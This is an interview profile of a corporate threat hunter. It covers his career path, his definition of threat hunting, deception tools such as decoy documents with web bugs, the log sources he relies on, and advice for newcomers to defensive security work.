Threat Hunter Profile – Matthew Hosburgh
PowerShell transcripts, Sysmon, Firewall & Host logs
Preferred Hunting Techniques
Anomaly Detection & Offensive Countermeasures
Carbon Black Response, Security Onion, ADHD & Kibana
Who are you?
I am currently a Cyber Threat Hunter for a Philadelphia-based company called Radian. From a very young age I was interested in not only computers, but the security (or insecurity) of them. I am fortunate enough to have found a career that supports my passion, making my job seem less like a job and more like a paid hobby.
I began my InfoSec career in the military working on various systems and networks supporting the Intelligence Community. After 8 years of active duty, I moved into a civilian role as a Security Analyst supporting a large Government contract. It was in this role where I began my work as a Threat Hunter, although under a slightly different title.
Over the past 3 years, I have been working on the completion of my Master of Science in Information Security Engineering with the SANS Institute. I am on track for a July 2017 graduation date.
What is your experience with Threat Hunting and how did you get started?
I began developing my skillset for hunting back in 2010 while working as a Security Analyst within a 24×7 SOC. From that role, I was promoted into the Critical Security Incident Response Team (CSIRT). In the CSIRT, I primarily worked with incidents or events that did not fit a mold, requiring a great deal of analysis. I would often take Indicators of Compromise (IOCs) to conduct historical searches of the organization’s networks for any indication that an adversary was present. After working with at the SOC, I moved into a Security Engineering role for another company where the proactive intrusion analysis was focused on SCADA systems.
There’s something about the active pursuit of an adversary on a network that draws me in. I started hunting because of the detection delta. Basically, the time it takes for an organization to know they are owned to when a system or analyst is notified or made aware of the incident. I believe that the Threat Hunter is one way to reduce the delta and actually find the advanced adversaries faster.
How would you define Threat Hunting?
I would define Threat Hunting as: “the [proactive] pursuit of abnormal activity on servers and endpoints that may be signs of compromise, intrusion, or exfiltration of data [both from external and internal entities].” I have taken Carbon Black’s definition and slightly modified it.
What projects and organizations are you involved with right now?
I am currently building the Threat Hunting Program for Radian. The goal is to align the program with the organization’s objectives and to measure the program’s effectiveness via metrics.
Which of the hunts you’ve carried out was the most interesting or challenging?
As a typical starting point, I categorize my hunting activities into three areas:
- Environmental (what is normal and what is not)
- Pattern based (attack patterns based off of past intrusions)
- Threat Intelligence (via feeds or internally generated)
The most challenging and interesting is the threat intelligence based hunt. I don’t mean just threat feeds, either. I mean generating real and actionable intelligence that can be consumed by other systems within the organization. This is challenging because it requires the Threat Hunter to have an idea of what the organization is trying to protect and who the organization’s adversaries are. Based on that knowledge, the threat intel priorities can be set. If my goal is to hunt insiders leaking sensitive information, my threat intel would look a lot different than if my priority was on an adversary trying to DDoS the organization.
What hunting techniques, tools, and datasets do you use most frequently?
One method that I’ve been exploring more recently is the use of Offensive Countermeasures. Specifically, I leverage systems that can annoy and/or attribute an adversary. A system from Black Hills InfoSec, dubbed ADHD, includes a plethora of tools that can be leveraged to attribute who is attacking you, and even, who is leaking information. The latest buzz word for these types of systems is decoys or deception platforms aka Honey Pots/Nets etc. For me, this technique brings the Hunter closer to the adversary and can help generate some very high fidelity threat indicators.
Before these types of tools can be leveraged for Hunting, the Threat Hunter must understand what data the organization is trying to protect and who the adversaries are (or could be). I leverage a method of Threat Modeling in generating this conclusion. What I have found to be most effective is to hold several working groups and ask the participants from a cross section of the organization these foundational questions. The more broad the cross-section, the more complete the feedback is. Often this is some of the best threat modeling that can be done because it leverages various expertise and tacit knowledge.
For example, if the result of the Threat Modelling exercise pointed to insiders as the top adversary and confidential data as the “Crown Jewels”, I would leverage ADHD tools to insert web bugs into dummy documents. These web bugs would make a call-back to the Web Bug server when opened, which can be used as an early warning that, somehow, data is leaving the organization. It would further indicate that there is an active insider. The hope is that the insider can be identified before any real sensitive data is exfiltrated. In some cases, this insider might have leaked the data inadvertently. Because of this, once a smaller list of insiders is developed, another tool, known as Molehunt, can hone in on a smaller set of potential insiders to answer the question of inadvertent leak or intention exfiltration. This all comes back down to the proactive pursuit of adversaries on the network—which can be internal, external, or both.
Security Onion is a great Threat Hunting platform that can rapidly be deployed leveraged for hunting activities. SO is moving to Elastic Search and Kibana, which is an exciting advancement. Also, it’s free and open source.
Some of my other favorite datasets include firewall logs combined with host based data (think Sysmon or Carbon Black Response). Also, if you do not have these tools, increasing the logging of PowerShell is a must. Enabling transcription can give a Hunter the exact PowerShell commands and output from those commands.
What value do you actively see come out of your hunting activities?
The biggest value I see is the ability to decrease the detection delta i.e. finding evil on the network. Threat Hunting isn’t just about external entities, however. One great function of Threat Hunting is the ability to find mis-configurations or other issues before they become massive problems for an organization. Back to my definition, Threat Hunting is about proactively finding external and internal threats—even if those threats are self-inflicted.
What types of friendly intelligence are most useful for a hunter to have in an investigation?
The CIS Critical Controls is a brilliant blueprint for understanding what a Threat Hunter needs. I usually start with the first two controls: Inventory of authorized and unauthorized devices and inventory of authorized and unauthorized software. If your organization has a grasp on these, you will be better off when hunting. Another great info source to understand (relates to the 6th control) is what is being logged and how detailed. Also, what isn’t being logged, or where the blind spots are can help you to understand where additional resources are needed.
What general advice do you have for new Threat Hunters?
Remember, Threat Hunting’s biggest value is when you can spend the time analyzing the anomalies that systems cannot detect. The more time you can spend in this area, the more beneficial you can be as a Hunter. If you find yourself doing repeatable tasks, you should automate them so you can focus on higher level functions.
If you’re new, spend a good deal of time understanding the organization. What are they trying to protect and who are their adversaries? If you understand this up front, you can develop a hunting strategy around the most critical areas and work outwards from there if nothing is found.
What would you like to see Threat Hunting develop into across the industry in the future?
As a necessary role for any organization. It seems like Threat Hunting is becoming a full-time role for many. It’s great the industry is moving towards this.